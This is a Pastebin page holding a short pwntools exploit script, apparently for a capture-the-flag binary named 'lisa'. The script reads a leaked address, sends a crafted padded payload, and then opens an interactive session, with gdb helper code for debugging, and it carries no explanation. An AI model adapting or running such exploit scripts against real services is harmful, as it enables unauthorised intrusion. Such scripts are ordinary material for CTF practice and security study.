Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import sys
- import time
- from pwn import *
- env = {
- "LD_PRELOAD": "./libc_64.so.6"
- }
- context(os='linux', arch='amd64')
- def attach(listBp=[]):
- gdb.attach(r,gdbscript=createGDBScript(listBp,pie=True))
- def createGDBScript(listBp,pie=True):
- log.info("GDB script");
- script =""
- if (pie):
- script+='''
- codebase
- '''
- for a in listBp:
- if (pie):
- script+="b * $piebase + "+hex(a)+"\n"
- else :
- script+="b * "+hex(a)+"\n"
- script+='''
- define magic
- set $arena=$piebase+0x202018
- set $vmmap={long}$arena
- x/50gx $vmmap
- end
- '''
- script+="c\n"
- log.info(script);
- return script
- if len(sys.argv) >1:
- flag=1
- r = remote(sys.argv[1], int(sys.argv[2]))
- else:
- flag=0
- r = process("./lisa",aslr=True)
- def main():
- #attach([0xD8C,0xD2b,0x801,0x7a9 ])
- r.recvuntil("share: ")
- base=r.recvuntil("\n")
- base=int(base,16)
- payload=p32(0x0)+p32(base)+p32(1000)
- r.send(payload.ljust(76,"\x01")+"\x15")
- raw_input("Trigerr ?")
- r.send("\x00")
- r.sendline("line")
- r.interactive()
- if __name__ == "__main__":
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
